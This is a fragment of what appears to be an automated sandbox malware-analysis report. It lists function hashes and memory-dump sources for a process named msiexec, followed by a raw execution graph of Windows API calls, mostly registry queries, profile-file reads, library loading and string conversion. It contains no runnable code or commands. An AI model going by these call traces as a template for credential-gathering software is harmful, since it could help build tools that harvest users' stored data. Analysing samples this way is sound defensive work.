                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                    • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1961120804-0
                                                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0.5%
                                                                                                    Total number of Nodes:762
                                                                                                    Total number of Limit Nodes:20
                                                                                                    execution_graph 33988 40fc40 70 API calls 34164 403640 21 API calls 33989 427fa4 42 API calls 34165 412e43 _endthreadex 34166 425115 76 API calls __fprintf_l 34167 43fe40 133 API calls 33992 425115 83 API calls __fprintf_l 33993 401445 memcpy memcpy DialogBoxParamA 33994 440c40 34 API calls 33996 411853 RtlInitializeCriticalSection memset 33997 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34173 40a256 13 API calls 34175 432e5b 17 API calls 34177 43fa5a 20 API calls 33999 401060 41 API calls 34180 427260 CloseHandle memset memset 34003 410c68 FindResourceA SizeofResource LoadResource LockResource 34182 405e69 14 API calls 34005 433068 15 API calls __fprintf_l 34184 414a6d 18 API calls 34185 43fe6f 134 API calls 34007 424c6d 15 API calls __fprintf_l 34186 426741 19 API calls 34009 440c70 17 API calls 34010 443c71 42 API calls 34013 427c79 24 API calls 34189 416e7e memset __fprintf_l 34017 42800b 47 API calls 34018 425115 85 API calls __fprintf_l 34192 41960c 61 API calls 34019 43f40c 122 API calls __fprintf_l 34022 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34023 43f81a 20 API calls 34025 414c20 memset memset 34026 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34196 414625 18 API calls 34197 404225 modf 34198 403a26 strlen WriteFile 34200 40422a 12 API calls 34204 427632 memset memset memcpy 34205 40ca30 59 API calls 34206 404235 26 API calls 34027 42ec34 61 API calls __fprintf_l 34028 425115 76 API calls __fprintf_l 34207 425115 77 API calls __fprintf_l 34209 44223a 38 API calls 34034 43183c 112 API calls 34210 44b2c5 _onexit __dllonexit 34215 42a6d2 memcpy __allrem 34036 405cda 60 API calls 34223 43fedc 138 API calls 34224 4116e1 16 API calls __fprintf_l 34039 4244e6 19 API calls 34041 42e8e8 127 API calls __fprintf_l 34042 4118ee RtlLeaveCriticalSection 34229 43f6ec 22 API calls 34044 425115 119 API calls __fprintf_l 34045 410cf3 EnumResourceNamesA 34232 4492f0 memcpy memcpy 34234 43fafa 18 API calls 34236 4342f9 15 API calls __fprintf_l 34046 4144fd 19 API calls 34238 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34239 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34242 443a84 _mbscpy 34244 43f681 17 API calls 34049 404487 22 API calls 34246 415e8c 16 API calls __fprintf_l 34053 411893 RtlDeleteCriticalSection __fprintf_l 34054 41a492 42 API calls 34250 403e96 34 API calls 34251 410e98 memset SHGetPathFromIDList SendMessageA 33195 44b49f 33196 444c4a 33195->33196 33197 444c56 GetModuleHandleA 33196->33197 33198 444c68 __set_app_type __p__fmode __p__commode 33197->33198 33200 444cfa 33198->33200 33201 444d02 __setusermatherr 33200->33201 33202 444d0e 33200->33202 33201->33202 33214 444e22 _controlfp 33202->33214 33204 444d13 _initterm __getmainargs _initterm 33205 444d6a GetStartupInfoA 33204->33205 33207 444d9e GetModuleHandleA 33205->33207 33215 40cf44 33207->33215 33211 444dcf _cexit 33213 444e04 33211->33213 33212 444dc8 exit 33212->33211 33214->33204 33266 404a99 LoadLibraryA 33215->33266 33217 40cf60 33254 40cf64 33217->33254 33274 410d0e 33217->33274 33219 40cf6f 33278 40ccd7 ??2@YAPAXI 33219->33278 33221 40cf9b 33292 407cbc 33221->33292 33226 40cfc4 33311 409825 memset 33226->33311 33227 40cfd8 33316 4096f4 memset 33227->33316 33232 40d181 ??3@YAXPAX 33234 40d1b3 33232->33234 33235 40d19f DeleteObject 33232->33235 33233 407e30 _strcmpi 33236 40cfee 33233->33236 33340 407948 free free 33234->33340 33235->33234 33238 40cff2 RegDeleteKeyA 33236->33238 33239 40d007 EnumResourceTypesA 33236->33239 33238->33232 33241 40d047 33239->33241 33242 40d02f MessageBoxA 33239->33242 33240 40d1c4 33341 4080d4 free 33240->33341 33243 40d0a0 CoInitialize 33241->33243 33321 40ce70 33241->33321 33242->33232 33338 40cc26 strncat memset RegisterClassA CreateWindowExA 33243->33338 33247 40d1cd 33342 407948 free free 33247->33342 33249 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33339 40c256 PostMessageA 33249->33339 33251 40d061 ??3@YAXPAX 33251->33234 33255 40d084 DeleteObject 33251->33255 33252 40d09e 33252->33243 33254->33211 33254->33212 33255->33234 33258 40d0f9 GetMessageA 33259 40d17b CoUninitialize 33258->33259 33260 40d10d 33258->33260 33259->33232 33261 40d113 TranslateAccelerator 33260->33261 33263 40d145 IsDialogMessage 33260->33263 33264 40d139 IsDialogMessage 33260->33264 33261->33260 33262 40d16d GetMessageA 33261->33262 33262->33259 33262->33261 33263->33262 33265 40d157 TranslateMessage DispatchMessageA 33263->33265 33264->33262 33264->33263 33265->33262 33267 404ac4 GetProcAddress 33266->33267 33270 404aec 33266->33270 33268 404add FreeLibrary 33267->33268 33271 404ad4 33267->33271 33269 404ae8 33268->33269 33268->33270 33269->33270 33272 404b13 33270->33272 33273 404afc MessageBoxA 33270->33273 33271->33268 33272->33217 33273->33217 33275 410d17 LoadLibraryA 33274->33275 33276 410d3c 33274->33276 33275->33276 33277 410d2b GetProcAddress 33275->33277 33276->33219 33277->33276 33279 40cd08 ??2@YAPAXI 33278->33279 33281 40cd26 33279->33281 33283 40cd2d 33279->33283 33350 404025 6 API calls 33281->33350 33284 40cd66 33283->33284 33285 40cd59 DeleteObject 33283->33285 33343 407088 33284->33343 33285->33284 33287 40cd6b 33346 4019b5 33287->33346 33290 4019b5 strncat 33291 40cdbf _mbscpy 33290->33291 33291->33221 33352 407948 free free 33292->33352 33294 407e04 33353 407a55 33294->33353 33297 407a1f malloc memcpy free free 33299 407cf7 33297->33299 33298 407ddc 33298->33294 33358 407a1f 33298->33358 33299->33294 33299->33297 33299->33298 33301 407d83 33299->33301 33302 407d7a free 33299->33302 33356 40796e 7 API calls 33299->33356 33301->33299 33357 406f30 malloc memcpy free 33301->33357 33302->33299 33307 407e30 33308 407e38 33307->33308 33309 407e57 33307->33309 33308->33309 33310 407e41 _strcmpi 33308->33310 33309->33226 33309->33227 33310->33308 33310->33309 33366 4097ff 33311->33366 33313 409854 33371 409731 33313->33371 33317 4097ff 3 API calls 33316->33317 33318 409723 33317->33318 33391 40966c 33318->33391 33405 4023b2 33321->33405 33326 40ced3 33489 40cdda 7 API calls 33326->33489 33327 40cece 33331 40cf3f 33327->33331 33442 40c3d0 memset GetModuleFileNameA strrchr 33327->33442 33331->33251 33331->33252 33334 40ceed 33468 40affa 33334->33468 33338->33249 33339->33258 33340->33240 33341->33247 33342->33254 33351 406fc7 memset _mbscpy 33343->33351 33345 40709f CreateFontIndirectA 33345->33287 33347 4019e1 33346->33347 33348 4019c2 strncat 33347->33348 33349 4019e5 memset LoadIconA 33347->33349 33348->33347 33349->33290 33350->33283 33351->33345 33352->33299 33354 407a65 33353->33354 33355 407a5b free 33353->33355 33354->33307 33355->33354 33356->33299 33357->33301 33359 407a38 33358->33359 33360 407a2d free 33358->33360 33365 406f30 malloc memcpy free 33359->33365 33361 407a44 33360->33361 33364 40796e 7 API calls 33361->33364 33363 407a43 33363->33361 33364->33294 33365->33363 33382 406f96 GetModuleFileNameA 33366->33382 33368 409805 strrchr 33369 409814 33368->33369 33370 409817 _mbscat 33368->33370 33369->33370 33370->33313 33383 44b090 33371->33383 33376 40930c 3 API calls 33377 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33376->33377 33378 4097c5 LoadStringA 33377->33378 33381 4097db 33378->33381 33380 4097f3 33380->33232 33381->33378 33381->33380 33390 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33381->33390 33382->33368 33384 40973e _mbscpy _mbscpy 33383->33384 33385 40930c 33384->33385 33386 44b090 33385->33386 33387 409319 memset GetPrivateProfileStringA 33386->33387 33388 409374 33387->33388 33389 409364 WritePrivateProfileStringA 33387->33389 33388->33376 33389->33388 33390->33381 33401 406f81 GetFileAttributesA 33391->33401 33393 409675 33394 4096ee 33393->33394 33395 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33393->33395 33394->33233 33402 409278 GetPrivateProfileStringA 33395->33402 33397 4096c9 33403 409278 GetPrivateProfileStringA 33397->33403 33399 4096da 33404 409278 GetPrivateProfileStringA 33399->33404 33401->33393 33402->33397 33403->33399 33404->33394 33491 409c1c 33405->33491 33408 401e69 memset 33530 410dbb 33408->33530 33411 401ec2 33554 4070e3 strlen _mbscat _mbscpy _mbscat 33411->33554 33412 401ed4 33543 406f81 GetFileAttributesA 33412->33543 33415 401ee6 strlen strlen 33417 401f15 33415->33417 33418 401f28 33415->33418 33555 4070e3 strlen _mbscat _mbscpy _mbscat 33417->33555 33544 406f81 GetFileAttributesA 33418->33544 33421 401f35 33545 401c31 33421->33545 33424 401f75 33426 402165 33424->33426 33427 401f9c memset 33424->33427 33425 401c31 5 API calls 33425->33424 33429 402195 ExpandEnvironmentStringsA 33426->33429 33430 4021a8 _strcmpi 33426->33430 33556 410b62 RegEnumKeyExA 33427->33556 33562 406f81 GetFileAttributesA 33429->33562 33430->33326 33430->33327 33432 401fd9 atoi 33433 401fef memset memset sprintf 33432->33433 33440 401fc9 33432->33440 33557 410b1e 33433->33557 33436 406f81 GetFileAttributesA 33436->33440 33437 402076 memset memset strlen strlen 33437->33440 33438 4070e3 strlen _mbscat _mbscpy _mbscat 33438->33440 33439 4020dd strlen strlen 33439->33440 33440->33426 33440->33432 33440->33436 33440->33437 33440->33438 33440->33439 33441 402167 _mbscpy 33440->33441 33561 410b62 RegEnumKeyExA 33440->33561 33441->33426 33443 40c422 33442->33443 33444 40c425 _mbscat _mbscpy _mbscpy 33442->33444 33443->33444 33445 40c49d 33444->33445 33446 40c512 33445->33446 33447 40c502 GetWindowPlacement 33445->33447 33448 40c538 33446->33448 33580 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33446->33580 33447->33446 33573 409b31 33448->33573 33452 40ba28 33453 40ba87 33452->33453 33459 40ba3c 33452->33459 33583 406c62 LoadCursorA SetCursor 33453->33583 33455 40ba8c 33584 403c16 33455->33584 33650 404734 33455->33650 33658 404785 33455->33658 33661 4107f1 33455->33661 33456 40ba43 _mbsicmp 33456->33459 33457 40baa0 33458 407e30 _strcmpi 33457->33458 33462 40bab0 33458->33462 33459->33453 33459->33456 33664 40b5e5 10 API calls 33459->33664 33460 40bafa SetCursor 33460->33334 33462->33460 33463 40baf1 qsort 33462->33463 33463->33460 33954 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33468->33954 33470 40b00e 33471 40b016 33470->33471 33472 40b01f GetStdHandle 33470->33472 33955 406d1a CreateFileA 33471->33955 33473 40b01c 33472->33473 33475 40b035 33473->33475 33476 40b12d 33473->33476 33956 406c62 LoadCursorA SetCursor 33475->33956 33960 406d77 9 API calls 33476->33960 33479 40b136 33490 40c580 28 API calls 33479->33490 33480 40b087 33487 40b0a1 33480->33487 33958 40a699 12 API calls 33480->33958 33481 40b042 33481->33480 33481->33487 33957 40a57c strlen WriteFile 33481->33957 33484 40b0d6 33485 40b116 CloseHandle 33484->33485 33486 40b11f SetCursor 33484->33486 33485->33486 33486->33479 33487->33484 33959 406d77 9 API calls 33487->33959 33489->33327 33490->33331 33503 409a32 33491->33503 33494 409c80 memcpy memcpy 33495 409cda 33494->33495 33495->33494 33496 408db6 12 API calls 33495->33496 33497 409d18 ??2@YAPAXI ??2@YAPAXI 33495->33497 33496->33495 33498 409d54 ??2@YAPAXI 33497->33498 33501 409d8b 33497->33501 33498->33501 33513 409b9c 33501->33513 33502 4023c1 33502->33408 33504 409a44 33503->33504 33505 409a3d ??3@YAXPAX 33503->33505 33506 409a52 33504->33506 33507 409a4b ??3@YAXPAX 33504->33507 33505->33504 33508 409a5c ??3@YAXPAX 33506->33508 33510 409a63 33506->33510 33507->33506 33508->33510 33509 409a83 ??2@YAPAXI ??2@YAPAXI 33509->33494 33510->33509 33511 409a73 ??3@YAXPAX 33510->33511 33512 409a7c ??3@YAXPAX 33510->33512 33511->33512 33512->33509 33514 407a55 free 33513->33514 33515 409ba5 33514->33515 33516 407a55 free 33515->33516 33517 409bad 33516->33517 33518 407a55 free 33517->33518 33519 409bb5 33518->33519 33520 407a55 free 33519->33520 33521 409bbd 33520->33521 33522 407a1f 4 API calls 33521->33522 33523 409bd0 33522->33523 33524 407a1f 4 API calls 33523->33524 33525 409bda 33524->33525 33526 407a1f 4 API calls 33525->33526 33527 409be4 33526->33527 33528 407a1f 4 API calls 33527->33528 33529 409bee 33528->33529 33529->33502 33531 410d0e 2 API calls 33530->33531 33532 410dca 33531->33532 33533 410dfd memset 33532->33533 33563 4070ae 33532->33563 33537 410e1d 33533->33537 33536 401e9e strlen strlen 33536->33411 33536->33412 33538 410e7f _mbscpy 33537->33538 33566 410d3d _mbscpy 33537->33566 33538->33536 33540 410e5b 33567 410add RegQueryValueExA 33540->33567 33542 410e73 33542->33538 33543->33415 33544->33421 33546 401c4c 33545->33546 33553 401ca1 33546->33553 33568 410add RegQueryValueExA 33546->33568 33548 401c6a 33549 401c71 strchr 33548->33549 33548->33553 33550 401c85 strchr 33549->33550 33549->33553 33551 401c94 33550->33551 33550->33553 33569 406f06 strlen 33551->33569 33553->33424 33553->33425 33554->33412 33555->33418 33556->33440 33558 410b34 33557->33558 33559 410b4c 33558->33559 33572 410add RegQueryValueExA 33558->33572 33559->33440 33561->33440 33562->33430 33564 4070bd GetVersionExA 33563->33564 33565 4070ce 33563->33565 33564->33565 33565->33533 33565->33536 33566->33540 33567->33542 33568->33548 33570 406f17 33569->33570 33571 406f1a memcpy 33569->33571 33570->33571 33571->33553 33572->33559 33574 409b40 33573->33574 33576 409b4e 33573->33576 33581 409901 memset SendMessageA 33574->33581 33577 409b99 33576->33577 33578 409b8b 33576->33578 33577->33452 33582 409868 SendMessageA 33578->33582 33580->33448 33581->33576 33582->33577 33583->33455 33585 4107f1 FreeLibrary 33584->33585 33586 403c30 LoadLibraryA 33585->33586 33587 403c74 33586->33587 33588 403c44 GetProcAddress 33586->33588 33589 4107f1 FreeLibrary 33587->33589 33588->33587 33590 403c5e 33588->33590 33591 403c7b 33589->33591 33590->33587 33594 403c6b 33590->33594 33592 404734 3 API calls 33591->33592 33593 403c86 33592->33593 33665 4036e5 33593->33665 33594->33591 33597 4036e5 23 API calls 33598 403c9a 33597->33598 33599 4036e5 23 API calls 33598->33599 33600 403ca4 33599->33600 33601 4036e5 23 API calls 33600->33601 33602 403cae 33601->33602 33675 4085d2 33602->33675 33608 403cd2 33610 403cf7 33608->33610 33827 402bd1 37 API calls 33608->33827 33611 403d1c 33610->33611 33828 402bd1 37 API calls 33610->33828 33710 402c5d 33611->33710 33615 4070ae GetVersionExA 33616 403d31 33615->33616 33618 403d61 33616->33618 33829 402b22 42 API calls 33616->33829 33620 403d97 33618->33620 33830 402b22 42 API calls 33618->33830 33621 403dcd 33620->33621 33831 402b22 42 API calls 33620->33831 33722 410808 33621->33722 33625 404785 FreeLibrary 33626 403de8 33625->33626 33726 402fdb 33626->33726 33629 402fdb 29 API calls 33630 403e00 33629->33630 33738 4032b7 33630->33738 33639 403e3b 33641 403e73 33639->33641 33642 403e46 _mbscpy 33639->33642 33785 40fb00 33641->33785 33833 40f334 333 API calls 33642->33833 33651 404785 FreeLibrary 33650->33651 33652 40473b LoadLibraryA 33651->33652 33653 40474c GetProcAddress 33652->33653 33656 40476e 33652->33656 33654 404764 33653->33654 33653->33656 33654->33656 33655 404781 33655->33457 33656->33655 33657 404785 FreeLibrary 33656->33657 33657->33655 33659 4047a3 33658->33659 33660 404799 FreeLibrary 33658->33660 33659->33457 33660->33659 33662 410807 33661->33662 33663 4107fc FreeLibrary 33661->33663 33662->33457 33663->33662 33664->33459 33666 4037c5 33665->33666 33667 4036fb 33665->33667 33666->33597 33667->33666 33668 403716 strchr 33667->33668 33668->33666 33669 403730 33668->33669 33834 4021b6 memset 33669->33834 33671 40373f _mbscpy _mbscpy strlen 33672 4037a4 _mbscpy 33671->33672 33673 403789 sprintf 33671->33673 33835 4023e5 16 API calls 33672->33835 33673->33672 33676 4085e2 33675->33676 33836 4082cd 11 API calls 33676->33836 33678 4085ec 33679 40860b memset 33678->33679 33681 403cba 33678->33681 33838 410b62 RegEnumKeyExA 33679->33838 33687 40821d 33681->33687 33682 408637 33682->33681 33683 40865c memset 33682->33683 33840 40848b 10 API calls 33682->33840 33841 410b62 RegEnumKeyExA 33682->33841 33839 410add RegQueryValueExA 33683->33839 33688 40823f 33687->33688 33689 403cc6 33688->33689 33690 408246 memset 33688->33690 33695 4086e0 33689->33695 33842 410b62 RegEnumKeyExA 33690->33842 33692 40826f 33692->33689 33843 4080ed 11 API calls 33692->33843 33844 410b62 RegEnumKeyExA 33692->33844 33845 4045db 33695->33845 33700 408737 wcslen 33701 4088ef 33700->33701 33707 40876a 33700->33707 33853 404656 33701->33853 33702 40877a wcsncmp 33702->33707 33704 404734 3 API calls 33704->33707 33705 404785 FreeLibrary 33705->33707 33706 408812 memset 33706->33707 33708 40883c memcpy wcschr 33706->33708 33707->33701 33707->33702 33707->33704 33707->33705 33707->33706 33707->33708 33709 4088c3 LocalFree 33707->33709 33856 40466b _mbscpy 33707->33856 33708->33707 33709->33707 33711 402c7a 33710->33711 33712 402c87 memset 33711->33712 33721 402d9a 33711->33721 33857 410b62 RegEnumKeyExA 33712->33857 33714 402cb2 33715 410b1e RegQueryValueExA 33714->33715 33717 402d3a sprintf 33714->33717 33714->33721 33858 402bd1 37 API calls 33714->33858 33859 402bd1 37 API calls 33714->33859 33860 410b62 RegEnumKeyExA 33714->33860 33716 402ce4 memset sprintf 33715->33716 33716->33714 33717->33714 33721->33615 33723 410816 33722->33723 33724 4107f1 FreeLibrary 33723->33724 33725 403ddd 33724->33725 33725->33625 33727 402ff9 33726->33727 33728 403006 memset 33727->33728 33729 403122 33727->33729 33861 410b62 RegEnumKeyExA 33728->33861 33729->33629 33731 410b1e RegQueryValueExA 33732 403058 memset sprintf 33731->33732 33737 403033 33732->33737 33733 4030a2 memset 33862 410b62 RegEnumKeyExA 33733->33862 33734 410b62 RegEnumKeyExA 33734->33737 33737->33729 33737->33731 33737->33733 33737->33734 33863 402db3 24 API calls 33737->33863 33739 4032d5 33738->33739 33740 4033a9 33738->33740 33864 4021b6 memset 33739->33864 33753 4034e4 memset memset 33740->33753 33742 4032e1 33865 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33742->33865 33744 4032ea 33745 4032f8 memset GetPrivateProfileSectionA 33744->33745 33866 4023e5 16 API calls 33744->33866 33745->33740 33750 40332f 33745->33750 33747 40339b strlen 33747->33740 33747->33750 33749 403350 strchr 33749->33750 33750->33740 33750->33747 33867 4021b6 memset 33750->33867 33868 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33750->33868 33869 4023e5 16 API calls 33750->33869 33754 410b1e RegQueryValueExA 33753->33754 33755 40353f 33754->33755 33756 40357f 33755->33756 33757 403546 _mbscpy 33755->33757 33761 403985 33756->33761 33870 406d55 strlen _mbscat 33757->33870 33759 403565 _mbscat 33871 4033f0 19 API calls 33759->33871 33872 40466b _mbscpy 33761->33872 33765 4039aa 33767 4039ff 33765->33767 33873 40f6e2 33765->33873 33889 40f460 12 API calls 33765->33889 33890 4038e8 21 API calls 33765->33890 33768 404785 FreeLibrary 33767->33768 33769 403a0b 33768->33769 33770 4037ca memset memset 33769->33770 33892 444551 memset 33770->33892 33772 4038e2 33772->33639 33832 40f334 333 API calls 33772->33832 33775 40382e 33776 406f06 2 API calls 33775->33776 33777 403843 33776->33777 33778 406f06 2 API calls 33777->33778 33779 403855 strchr 33778->33779 33780 403884 _mbscpy 33779->33780 33781 403897 strlen 33779->33781 33782 4038bf _mbscpy 33780->33782 33781->33782 33783 4038a4 sprintf 33781->33783 33901 4023e5 16 API calls 33782->33901 33783->33782 33786 40fb10 33785->33786 33787 403e7f 33786->33787 33788 40fb55 RegQueryValueExA 33786->33788 33795 40f96c 33787->33795 33788->33787 33789 40fb84 33788->33789 33790 404734 3 API calls 33789->33790 33791 40fb91 33790->33791 33791->33787 33792 40fc19 LocalFree 33791->33792 33793 40fbdd memcpy memcpy 33791->33793 33792->33787 33905 40f802 7 API calls 33793->33905 33796 4070ae GetVersionExA 33795->33796 33797 40f98d 33796->33797 33798 4045db 7 API calls 33797->33798 33806 40f9a9 33798->33806 33799 40fae6 33800 404656 FreeLibrary 33799->33800 33801 403e85 33800->33801 33807 4442ea memset 33801->33807 33802 40fa13 memset WideCharToMultiByte 33803 40fa43 _strnicmp 33802->33803 33802->33806 33804 40fa5b WideCharToMultiByte 33803->33804 33803->33806 33805 40fa88 WideCharToMultiByte 33804->33805 33804->33806 33805->33806 33806->33799 33806->33802 33808 410dbb 7 API calls 33807->33808 33809 444329 33808->33809 33906 40759e strlen strlen 33809->33906 33814 410dbb 7 API calls 33815 444350 33814->33815 33816 40759e 3 API calls 33815->33816 33817 44435a 33816->33817 33818 444212 64 API calls 33817->33818 33819 444366 memset memset 33818->33819 33820 410b1e RegQueryValueExA 33819->33820 33821 4443b9 ExpandEnvironmentStringsA strlen 33820->33821 33822 4443f4 _strcmpi 33821->33822 33823 4443e5 33821->33823 33824 403e91 33822->33824 33825 44440c 33822->33825 33823->33822 33824->33457 33826 444212 64 API calls 33825->33826 33826->33824 33827->33610 33828->33611 33829->33618 33830->33620 33831->33621 33832->33639 33833->33641 33834->33671 33835->33666 33837 40841c 33836->33837 33837->33678 33838->33682 33839->33682 33840->33682 33841->33682 33842->33692 33843->33692 33844->33692 33846 404656 FreeLibrary 33845->33846 33847 4045e3 LoadLibraryA 33846->33847 33848 404651 33847->33848 33849 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33847->33849 33848->33700 33848->33701 33850 40463d 33849->33850 33851 404643 33850->33851 33852 404656 FreeLibrary 33850->33852 33851->33848 33852->33848 33854 404666 33853->33854 33855 40465c FreeLibrary 33853->33855 33854->33608 33855->33854 33856->33707 33857->33714 33858->33717 33859->33714 33860->33714 33861->33737 33862->33737 33863->33737 33864->33742 33865->33744 33866->33745 33867->33749 33868->33750 33869->33750 33870->33759 33871->33756 33872->33765 33891 40466b _mbscpy 33873->33891 33875 40f6fa 33876 4045db 7 API calls 33875->33876 33877 40f708 33876->33877 33878 40f7e2 33877->33878 33880 404734 3 API calls 33877->33880 33879 404656 FreeLibrary 33878->33879 33881 40f7f1 33879->33881 33884 40f715 33880->33884 33882 404785 FreeLibrary 33881->33882 33883 40f7fc 33882->33883 33883->33765 33884->33878 33885 40f797 WideCharToMultiByte 33884->33885 33886 40f7b8 strlen 33885->33886 33887 40f7d9 LocalFree 33885->33887 33886->33887 33888 40f7c8 _mbscpy 33886->33888 33887->33878 33888->33887 33889->33765 33890->33765 33891->33875 33893 44458b 33892->33893 33896 40381a 33893->33896 33902 410add RegQueryValueExA 33893->33902 33895 4445a4 33895->33896 33903 410add RegQueryValueExA 33895->33903 33896->33772 33900 4021b6 memset 33896->33900 33898 4445c1 33898->33896 33904 444879 30 API calls 33898->33904 33900->33775 33901->33772 33902->33895 33903->33898 33904->33896 33905->33792 33907 4075c9 33906->33907 33908 4075bb _mbscat 33906->33908 33909 444212 33907->33909 33908->33907 33926 407e9d 33909->33926 33912 44424d 33913 444274 33912->33913 33914 444258 33912->33914 33934 407ef8 33912->33934 33915 407e9d 9 API calls 33913->33915 33951 444196 51 API calls 33914->33951 33922 4442a0 33915->33922 33917 407ef8 9 API calls 33917->33922 33918 4442ce 33948 407f90 33918->33948 33922->33917 33922->33918 33924 444212 64 API calls 33922->33924 33944 407e62 33922->33944 33923 407f90 FindClose 33925 4442e4 33923->33925 33924->33922 33925->33814 33927 407f90 FindClose 33926->33927 33928 407eaa 33927->33928 33929 406f06 2 API calls 33928->33929 33930 407ebd strlen strlen 33929->33930 33931 407ee1 33930->33931 33932 407eea 33930->33932 33952 4070e3 strlen _mbscat _mbscpy _mbscat 33931->33952 33932->33912 33935 407f03 FindFirstFileA 33934->33935 33936 407f24 FindNextFileA 33934->33936 33937 407f3f 33935->33937 33938 407f46 strlen strlen 33936->33938 33939 407f3a 33936->33939 33937->33938 33941 407f7f 33937->33941 33938->33941 33942 407f76 33938->33942 33940 407f90 FindClose 33939->33940 33940->33937 33941->33912 33953 4070e3 strlen _mbscat _mbscpy _mbscat 33942->33953 33945 407e94 33944->33945 33946 407e6c strcmp 33944->33946 33945->33922 33946->33945 33947 407e83 strcmp 33946->33947 33947->33945 33949 407fa3 33948->33949 33950 407f99 FindClose 33948->33950 33949->33923 33950->33949 33951->33912 33952->33932 33953->33941 33954->33470 33955->33473 33956->33481 33957->33480 33958->33487 33959->33484 33960->33479 34056 426741 109 API calls __fprintf_l 34057 4344a2 18 API calls 34058 4094a2 10 API calls 34060 4108a4 7 API calls 34254 4116a6 15 API calls __fprintf_l 34255 43f6a4 17 API calls 34256 440aa3 20 API calls 34258 427430 45 API calls 34062 4090b0 7 API calls 34063 4148b0 15 API calls 34065 4118b4 RtlEnterCriticalSection 34066 4014b7 CreateWindowExA 34067 40c8b8 19 API calls 34069 4118bf RtlTryEnterCriticalSection 34263 42434a 18 API calls __fprintf_l 34265 405f53 12 API calls 34077 43f956 59 API calls 34079 40955a 17 API calls 34080 428561 36 API calls 34081 409164 7 API calls 34269 404366 19 API calls 34273 40176c ExitProcess 34276 410777 42 API calls 34086 40dd7b 51 API calls 34087 425d7c 16 API calls __fprintf_l 34278 43f6f0 25 API calls 34279 42db01 22 API calls 34088 412905 15 API calls __fprintf_l 34280 403b04 54 API calls 34281 405f04 SetDlgItemTextA GetDlgItemTextA 34282 44b301 ??3@YAXPAX 34285 4120ea 14 API calls 3 library calls 34286 40bb0a 8 API calls 34288 413f11 strcmp 34092 434110 17 API calls __fprintf_l 34095 425115 108 API calls __fprintf_l 34289 444b11 _onexit 34097 425115 76 API calls __fprintf_l 34100 429d19 10 API calls 34292 444b1f __dllonexit 34293 409f20 _strcmpi 34102 42b927 31 API calls 34296 433f26 19 API calls __fprintf_l 34297 44b323 FreeLibrary 34298 427f25 46 API calls 34299 43ff2b 17 API calls 34300 43fb30 19 API calls 34109 414d36 16 API calls 34111 40ad38 7 API calls 34302 433b38 16 API calls __fprintf_l 33979 44b33b 33980 44b344 ??3@YAXPAX 33979->33980 33981 44b34b 33979->33981 33980->33981 33982 44b354 ??3@YAXPAX 33981->33982 33983 44b35b 33981->33983 33982->33983 33984 44b364 ??3@YAXPAX 33983->33984 33985 44b36b 